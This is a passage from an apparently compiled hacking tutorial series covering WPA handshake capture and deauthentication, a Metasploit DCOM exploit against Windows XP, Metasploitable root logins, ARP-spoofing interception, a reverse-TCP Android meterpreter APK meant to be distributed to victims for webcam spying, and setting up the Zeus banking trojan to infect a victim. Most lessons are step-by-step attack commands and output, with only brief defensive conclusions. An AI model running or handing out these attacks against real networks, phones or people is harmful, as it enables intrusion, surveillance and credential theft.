if the network is using TKIP to encrypt the data. By the way, if you didn't understand much of it then don't worry. There's a reason why people don't search for hacking tutorials on Wikipedia (half the stuff goes above the head) Capturing The Handshake Now there are several (only 2 listed here) ways of capturing the handshake. We'll look at them one by one1. Wifite (easy and automatic) 2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own) Wifite Methodology We'll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don't mention this, I will (such a good guy I am :) ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won't reach them, and you'll keep wondering why you aren't getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but wifite does all this crap for you, and in case of airodumpng, you'll have to call a brethren (airreply-ng) to your rescue. Okay enough theory. Get the handshake with wifite Now my configuration here is quite simple. I have my cellphone creating a wireless network named 'me' protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do. root@kali:~# wifite .;' `;, .;' ,;' `;, `;, WiFite v2 (r85) .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: automated wireless auditor ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. ':. /___\ /_____\ / ,:' ,:' designed for Linux ,:' \ [+] scanning for wireless devices... [+] enabling monitor mode on wlan0... done [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready. [0:00:04] scanning wireless networks. 0 targets and 0 clients found [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready. NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- -----1 me 2 ******* 1 WPA2 57db wps 11 WEP 21db 3 ************** 11 WEP 21db no client no Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead., in this tutorial we'll forget that this network has WPS and capture the handshake instead) [+] select target numbers (1-3) separated by commas, or 'all': Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here's what happened. [+] 1 target selected. [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:24] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:08:05] listening for handshake... (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] disabling monitor mode on mon0... done [+] quitting Now I connected my other PC to 'me'. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what happens this time around. NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- -----1 * 1 WPA 99db no client 2 me 1 WPA2 47db wps client 3 * 11 WEP 22db 4 * 11 WEP 20db no clients no [+] select target numbers (1-4) separated by commas, or 'all': 2 [+] 1 target selected. [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:07] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:51] listening for handshake... (^C) WPA handshake capture interrupted [+] 2 attacks completed: [+] 0/2 WPA attacks succeeded [+] quitting Now the deauth attacks weren't working. This time I increased the deauth frequency. root@kali:~# wifite -wpadt 1 Soon, however, I realized, that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn't working. So time to bring my external card to the scene. root@kali:~# wifite .;' `;, .;' ,;' `;, `;, WiFite v2 (r85) .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: automated wireless auditor ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. /___\ ':. /_____\ / ,:' ,:' designed for Linux ,:' \ [+] scanning for wireless devices... [+] available wireless devices: 1. wlan1 Ralink RT2870/3070 2. wlan0 Atheros rt2800usb - [phy1] ath9k - [phy0] [+] select number of device to put into monitor mode (1-2): See, we can use the USB card now. This will solve the problems for us. Now look at wifite output NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- -----1 me 2 * 1 WPA2 44db wps client 11 WEP 16db 3 * no client 11 WEP 16db no [+] select target numbers (1-3) separated by commas, or 'all': Now I attack the target. This time, finally, I captured a handshake. [+] 1 target selected. [0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED) ^C0:00:01] WPS attack, 0/0 success/ttl, (^C) WPS brute-force attack interrupted [0:08:20] starting wpa handshake capture on "me" [0:07:23] listening for handshake... [0:00:57] handshake captured! saved as "hs/me_02-73-8D-**-**-**.cap" [+] 2 attacks completed: [+] 1/2 WPA attacks succeeded me (02:73:8D:37:A7:ED) handshake captured saved as hs/me_02-73-8D-**-**-**.cap [+] starting WPA cracker on 1 handshake [!] no WPA dictionary found! use -dict <file> command-line argument [+] disabling monitor mode on mon0... done [+] quitting As you can see, it took me 57 seconds to capture the handshake (5 deauth requests were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you. We'll use Wifite only to capture the handshake. Now the captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the same thing with airodump-ng. This time I won't show you the problems you might run into. It'll be a perfect ride, all the problems were seen in wifite case. Capturing Handshake with Airodump-ng Now if you skipped everything and got right here, then you are missing a lot of things. I'll end this pretty quick, as the wifite thing was quite detailed. I'm copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the point where you see red text) 1. Find out the name of your wireless adapter. Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know lo - loopback. Not important currently. eth - ethernet wlan - This is what we want. Note the suffix associated. Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter. Trouble with the wlan interface not showing up. This is because virtual machines can't use internal wireless cards and you will have to use external cards. You should try booting Kali using Live USB (just look at the first part of this tutorial), or buy an external card. 2. Enable Monitor mode Now, we use a tool called airmon-ng to interface called mon. Just type airmon-ng start wlan0 Your mon0 interface will be created. create a virtual 3. Start capturing packets Now, we'll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You'll see the name of the wifi you want to hack. airodump-ng mon0 4. Store the captured packets in a file This can be achieved by giving some more parameters with the airodump command airodump-ng mon0 --write name_of_file Non newbiesroot@kali:~# airmon-ng start wlan1 root@kali:~# airodump-ng mon0 -w anynamehere Now copy the bssid field of your target network (from airodump-ng ng screen)and launch a deauth attack with aireplay-ng root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0 The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0 secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID and replace BSSID here with your target BSSID. mon0 is the interface you created. In case you face problems with the monitor mode hopping from one channel to another, or problem with beacon frame, then fix mon0 on a channel usingroot@kali:~# airodump-ng mon0 -w anynamehere -c 1 Replace 1 with the channel where your target AP is. You might also need to add -ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite). Now when you look at the airodump-ng screen, you'll see that at the top right it says WPA handshake captured . Here is what it looks like CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: ** BSSID PWR RXQ Beacons 02:73:8D:37:A7:ED -47 75 201 #Data, #/s CH MB ENC CIPHER AUTH ESSID 35 0 1 54e WPA2 CCMP PSK me BSSID STATION PWR Rate * * 0 * * -35 0e- 1 0e- 1 Lost 742 Frames Probe 82 me 0 26 You can confirm it by typing the following root@kali:~# aircrack-ng anynamehere-01.cap Opening anynamehere-01.cap Read 212 packets. # BSSID ESSID 1 ************** me 2 ** Encryption WPA (1 handshake) Unknown Happy cracking, all that needs to be done in this tutorial has been done. Its been a long one. Hope it helped you. Lesson 20: Hacking Windows XP Penetration Testing - Hacking XP Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there. Virtual Machines Windows XP , installing XP on a VM will be a piece of cake, a few screenshots of the process) A look at Metasploit Framework Starting the framework "In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit service postgresql start (Metasploit uses PostgreSQL as its database so it needs to be launched first.) With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires. service metasploit start Now finally we are ready to start metasploit framework. msfconsole Looking at the targets Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan. Port Scan Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan To use this feature, enter the following codeuse auxiliary/scanner/portscan/tcp Type show options to see the available options show options Now we have to change a few settings, firstly, we should reduce the number of ports scanned set ports 1-500 Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type ipconfig In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as. In my case the IP is 192.168.63.131 Now go back to your Kali machine, and type the fol (change the IP as required) set RHOST 192.168.63.131 Here's what it should look like There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end. Now we are ready for some action, do a show options again to see what all changes you've made. Finally, typerun The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack. If you had not been using an unpatched version of Windows, there will not be any vulnerable ports. This basically means that there are no open ports here. Nothing much you can do. However if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the windows machine and run the auxiliary module again. I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports. Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open. Real life port scan In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later. Finding Exploits This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole. search dcom This is a very famous exploit for Windows. Copy the exploit number 3. (Which shows great as rank). In the next line, type use exploit/windows/dcerpc/ms03_026_dcom You are now using the most famous Windows exploit. Type show options again show options Again, set the RHOST as 192.168.63.131 (replace with the IP of your target) set RHOST 192.168.63.131 Also, set a payload. set PAYLOAD windows/shell_bind_tcp And here's the best part exploit You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial. We have a pentesting lab now and have successfully exploited an XP machine. Lesson 21: Metasploitable 2 Metasploitable 2 Linux - Most Vulnerable OS in the town : Introduction and Installation What is Metasploitable 2 The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. [Quoted from Rapid7] Download and install metasploitable linux Firstly, I'd list some requirements- 10 to 30 GB disk space for metasploitable (Kali would need a similar amount of disk space), 1GB ram for metasploitable (a total of 4GB would be great, 1gb for kali, 1gb for metasploit, and 2gb will keep your host OS running). If you have all this, which you probably should, then go ahead and download Metasploitable from sourceforge. - http://sourceforge.net/projects/metasploitable/ The last time I checked, the download was a zip file. After extracting it, no installation is needed. What IS needed is a virtual machine software like Vmware or virtualbox. You can use Virtual Box, which is free, or VmWare workstation, which you'll have to buy, Vmware player is free, and will serve most of your purposes. I am using Vmware Workstation, and will give the instructions for it. Detailed guides are available for all of these on the internet, and I won't waste much time with it. Assuming you have downloaded and extracted the Metasploitable file, and installed Vmware Workstation, follow these instruction- Open Vmware workstation. Click on file -> Open. Something like this will pop out. After that browse to the location where you extracted the Metasploitable file. It must look somewhat like this. Click on open. You will see something with Vmware icon. Open that one. Your Virtual machine will be up and running within a few minutes. Depending on the situation, a few more next and enter stuff would be required, but the instructions provided by the program would be simple and clear and you can help yourself. Once you've started Metasploitable You'll have a login prompt, and the login username and password would be given right there. It would be msfadmin, if you can't seem to find it. Nothing else needs to be done here. Now your target is ready, but you are far from done. If this is not your visit to this blog, then you have probably already installed Kali Linux and know how to use it. If you have been following this blog for a long time, then you also know how to use Metasploit to hack Windows machine, and are ready to jump to the next post. So if you have to OS, and the basic hacking skills, then you can stop here and move to the next post (coming soon). If not, follow along. Kali Linux and metasploit While its not necessary to use Kali Linux, and Backtrack, Backbox Linux and other Linux distributions will work well too, there is no reason why NOT to use Kali Linux. It simplifies everything for you, providing you with 100s of tools pre-installed, and is specifically designed for pentesting. It has some advantages over Backtrack, most importantly, it has been written from scratch in Debian and has resolved most of the backtrack issues. It comes preinstalled with Metasploit, so it takes down one step. Lesson 22: Man In The Middle Attack Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux. We will learn the step by step process how to do this. I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia. The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. Victim IP address : 192.168.8.90 Attacker network interface : eth0; with IP address : 192.168.8.93 Router IP address : 192.168.8.8 Requirements: 1. Arpspoof 2. Driftnet 3. Urlsnarf Step by step Kali Linux Man in the Middle Attack : 1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux. 2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window. 3. The next step is setting up arpspoof between victim and router. arpspoof -i eth0 -t 192.168.8.90 192.168.8.8 4. And then setting up arpspoof from to capture all packet from router to victim. arpspoof -i eth0 192.168.8.8 192.168.8.90 5. After step three and four, now all the packet sent or received by victim should be going through attacker machine. 6. Now we can try to use driftnet to monitor all victim image traffic. According to its website, Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic. 7. To run driftnet, we just run this driftnet -i eth0 When the victim browses a website with image, driftnet will capture all image traffic. To stop driftnet, just close the driftnet window or press CTRL + C in the terminal 8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code urlsnarf -i eth0 and urlsnarf will start capturing all website address visited by victim machine. 9. When the victim browses a website, attacker will know the address victim visited. Lesson 23: Metasploitable 2 – Vulnerability Assessment. Metasploitable 2 : Vulnerability assessment and Remote Login If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead. Portscan On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the ip of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all ports in that range, you can use Nmap scan. Here is what it should look like. nmap -sS 192.168.154.0/24 The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case). Vulnerabilities Now the Metasploitable 2 operating system has been loaded with a large number of vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 21. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. 2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS. 3. Weak Passwords - These are vulnerable to bruteforce attacks. 4. Vulnerable Web Services- A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited. 5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system. There is a very resourceful article about many vulnerabilities on Rapid7 website. Exploiting The Vulnerabilities Remote access vulnerability - Rlogin Remember the list of open ports which you came up across during the port scan? The 512,513 and 514 ports are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely login to Metasploitable 2. Type rlogin to see the details about the command structure. root@kali:~# rlogin usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-R [bind_address:]port:host:hostport] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command] rlogin -l root 192.168.154.132 Most probably you will get something like this- root@kali:~# rlogin -l root 192.168.154.132 The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established. RSA key fingerprint is *****. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts. [email protected]'s password: As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rshclient is a remote login utility that it will allow users to connect to remote machines. apt-get install rsh-client This will start the installation progress, you'll have to type yes once or twice, Kali will do the rest for you. After the installation is successful, you should try your previous command again. This time around, things will be better. root@kali:~# rlogin -l root 192.168.154.132 Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ You have mail. root@metasploitable:~# Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily. Telnet Vulnerability Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploit contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can login to a computer without knowing the credentials, just use :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then something for your appetitetelnet 192.168.99.131 1524 This is a another one line exploit, on the 1524 ingreslock port (see portscan result). Lesson 24: Hacking Android Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hack Android Smartphones using Metasploit. Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.What is android? according to wikipedia: and what is APK? according to wikipedia: Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu. Here is some initial information for this tutorial: Attacker IP address: 192.168.8.94 Attacker port to receive connection: 443 Requirements: 1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) 2. Android smartphone (we use HTC One android 4.4 KitKat) Step by Step Hacking Android Smartphone Tutorial using Metasploit: 1. Open terminal 2. We will utilize Metasploit payload framework to create exploit for this tutorial. msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> As described above that attacker IP address is 192.168.8.94 now execute the command. 3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console. Info: use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2 4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3. Info: set lhost 192.168.8.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection 5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ). 6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, the meterpreter session will open and the attack has begun. 7. this means that attacker already inside the victim android smartphone and he can do everything with victim phone. Experiment with different commands at this point, for example webcam_list gives you a list of the camera's on the victims device such as: back camera front camera webcam_snap 2 Would take a picture from one of the cameras sneaky sneaky. Conclusion: 1. Don't install APK's from the unknown source. 2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. Lesson 25: Remote Administration Tool (RAT) Today we will learn how to set up Remote Administration Tool Zeus BotNet (RAT). We choose Zeus because Zeus was one of the famous trojan horse viruses in history that infected many servers around 2007-2010. If you don't know about Zeus, here is the definition from Wikipedia: Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed that the creator of Zeus had said that he was retiring and had given the source code and rights to sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May 2011, the source code and compiled binaries are found to be hosted on GitHub. Requirements: 1. Remote Administration Tool (RAT) Zeus BotNet 2. Web Server + Database Server (in this example we use XAMPP) Remote Administration Tool(RAT) Zeus BotNet: 1. Firstly, we need to install the web server and database server. Since we're using XAMPP for this tutorial, you can refer to previous step by step How to Install XAMPP in 7 Simple Steps to install XAMPP on Windows machine and make sure your XAMPP apache and MySQL service was started and running. 2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and password, by default the username is root and password leave it empty. After that create a new database, I named it bot, but you can change it into whatever you want. This database name will be used for the installation of remote administration tool. 3. The next step we need to download the remote administration tool file and extract it, you will find 3 main folders, builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I give the folder name as bot, then copy the server [php] contents into C:\xampp\htdocs\bot. 4. Now back again into our web browser and type http://localhost/bot/install into the address bar. Input all required field with the correct information. Information: – The host address for MySQL filled with your database server IP address. If you run XAMPP it should be your IP address. – Database is filled with information about our database name that already created in step 2. – Encryption key you can fill with any characters with length from 1 – 255 click Install to start installing. Notes: If you get this error ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this MySQL server You need to do the following step by step a. Open your PHPMyAdmin http://localhost/phpmyadmin and click the Privileges tab. Click edit button to edit the root user privileges. b. In the edit user page, scroll down and find the login information section. Change the Host from localhost to Any host and press Go button. 6. The next step is configuring and create the zeus bot client. Open the builder folder and open config.txt configuration file. Change the url_config, url_loader and url_server configuration according to your settings for your IP address. Note: don't forget to edit the path of webinjects.txt. 7. Now for the next step, open the zsb.exe file. . Click builder, then click browse, Click build the bot configuration under the actions header, then build the bot executable. 8. After all the build bot config and bot executable on step 7, now we have the new file config.bin and bot.exe. Copy those two file into the htdocs folder. Mine was inside C:\xampp\htdocs\bot. 9. Now let's says we will send the generated bot.exe to the victim. After victim execute the file we can check our attacker server. Open the browser and type http://localhost/bot/cp.php and insert your username and password. 10. We can see the new infected victim in the web interface and even view the desktop screenshot of the victim. Conclusion: 1. When victim already infected, attacker can gather many information from the victim including all internet activities and even gather all the website username and password since this tool can act as a keylogger and capturing the log in information. 2. To prevent the attack of this trojan, always update your operating system and anti virus and do not click any link that looks suspicious in your mail or chat messenger. Lesson 26: Hacking Basic HTTP Authentication using Burp Suite Hacking http basic authentication dictionary attacks with burp suite free is our tutorial for today, we will use a tool called BURP suite. If you just hear about BURP suite, here is the explanation from their website: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Explanation about HTTP basic authentication. HTTP supports several authentication mechanisms. Upon a request for resource within a protected space the server should respond with authentication challenge using WWW-Authenticate header. In order to receive authorization the client should send requested identification information using Authorization header. When the client is not authorised a 401 “Unauthorised” response status is returned. The simplest and most common HTTP authentication in use is Basic. The clients need to provide the credentials in a Base64 encoded string username:password. If the credentials are correct the web server returns the requested resource otherwise the server repeats the authentication challenge. Requirements: 1. Download BURP suite at portswigger.net (in this tutorial I use the free edition) and install it. 2. Compose a basic PHP login script to use on the victim machine. Hacking HTTP Basic Authentication Dictionary Attacks with Burp Suite Free: 1. The PHP script on requirement number 2 is a simple log in page. You can copy it to your HTDOCS folder if you use XAMPP or WAMP for your web development platform. . 2. Run your BURP suite and change your browser proxy setting to run through BURP application. By default BURP will use port 8080, if you don't know how to change the browser proxy settings, a simple google search can tell you how. 3. When proxy already set up, now we can access the login.php file. In this example, for testing purpose, I will input username = test and password = test. When we click the submit button(LOG IN), BURP will intercept the data. Right click and choose "Send to Intruder". 4. On INTRUDER –> POSITIONS tab, change the attack type to "Cluster Bomb". 5. After finished setting up the attack type, we can move to PAYLOADS tab. To fill this PAYLOADS, see the picture on step 4 Payload set 1 = PHPSESSID (the value) we will set up the same PHP SESSID value, because the system uses a static PHPSESSID. 6. Now we will change the payload set number two, we're still on PAYLOADS TAB. Payload set 2 = username (the value) you can load the username data from username list. I input the username one by one. 7. On payload number three we will input the password. Payload set 3 = password (the value) on this step you also can load from a password list, but in above example I input the passwrd one by one. 8. The last PAYLOADS to set up is the submit parameter. Payload set 4 = submit (the value) since this submit is to check whether user click the button or not, we can make it the same value LOG+IN%21. 9. Every PAYLOADS has been set up successfully, now we will start the attack and watch BURP suite perform the attack automatically. Click Intruder and choose "Start Attack". 10. BURP suite itruder will check the username and password one by one. When there's matching username and password, you can view the length was changed. From this example we know that the username = admin and password = 123456 Conclusion: 1. To prevent this kind of attack, as a user you can do nothing, as developer you can do like GMail anti brute force system where every trying is logged by the system based on their IP address. If you try to log in and failed for several times, the system will force the user to solve the captcha. 2. As a developer you can do add the salt into username and password to make attack time much longer since you've added the salt, but in my opinion the first conclusion was better. Lesson 27: Hacking Wordpress – Send Secret emails from malicious layout codes about site info. oday title is Hacking WordPress: Send Email Secretly About Website Information. Requirements: 1. Understand PHP, 2. Know wordpress function, 3. Script to send email secretly (ask for script when ready). Step by step Hacking WordPress: Send Email Secretly About Website Information: 1. We want to know about the wordpress user information of a user. Let see the following script: 2. The script on step one if executed will show the details of active wordpress user (logged in). execute this script on your local wordpress server, here is what I got: Username: victim Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB User email: [email protected] User first name: User last name: User display name: victim User ID: 1 3. Even we know the username and password hash, but we still need time to crack the password hash to get the plain password from the user. On our last hacking tutorial about WordPress hacking tutorials to add administrator user secretly, we can add administrator secretly by spreading the malicious themes, but the problem is: "how do we know who already download the malicious wordpress themes?" 4. From the problem in step three, we will use the method to combine this tutorial WordPress hacking tutorials to add administrator user secretly and send the URL address of the infected website by inserting the following script. 5. When saw this email address, it's way too plain how if we encode it using base64_encode PHP function, and here is the result. 6. The script I provide you will send email secretly to the attacker containing the wordpress URL when victim logs in and browses his/her wordpress website. Conclusion: 1. Download the wordpress themes only from the trusted source. 2. Buying usually better than "free download" 3. Usually this kind of attack you can find on a premium wordpress themes (nulled edition or warez), make sure you check the source code one by one the themes to minimize the attack. you can give a try to find the strings below in your themes code (especially the nulled and warez edition) to check whether it has a malicious code or not. base64_encode (most attackers use base64 encoding) http:// (check the URL that going somewhere), Lesson 28: Reveal Asterisk Saved Passwords We will learn how to reveal the asterisk on Mozilla Firefox and Google Chrome without seeing the saved password from the browser options menu. If you still never heared about Firebug, here is the description from wikipedia: Firebug is a web development tool that facilitates the debugging, editing, and monitoring of any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development tools.[2] Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as external CSS, JavaScript, and image files. The net panel can display both request headers and response headers for each page asset; it can also estimate the time each asset took to load. Requirements: 1. Mozilla firefox with firebug addons. 2. Google chrome. Step by step to Reveal Asterisk Saved Passwords on Mozilla Firefox and Chrome: 1. Open our Mozilla Firefox browser, press ALT –> click Tools –> Click Add-ons 2. On Add-ons page, there is a search box, type firebug on the textbox and click search, or you can go directly to this page https://addons.mozilla.org/en-US/firefox/addon/firebug/. Click install if there is a pop out window asking you to install this add ons. and restart your browser. 3. This is the firebug button. to activate firebug you only need to click this button and click once again to deactivate. 4. Now we try to open a website with log in page, e.g: mail.live.com and input the password. Right click on the password box and choose Inspect Element. 5. Double click the type="password" and change it into type="text". 6. The asterisk password will be shown and 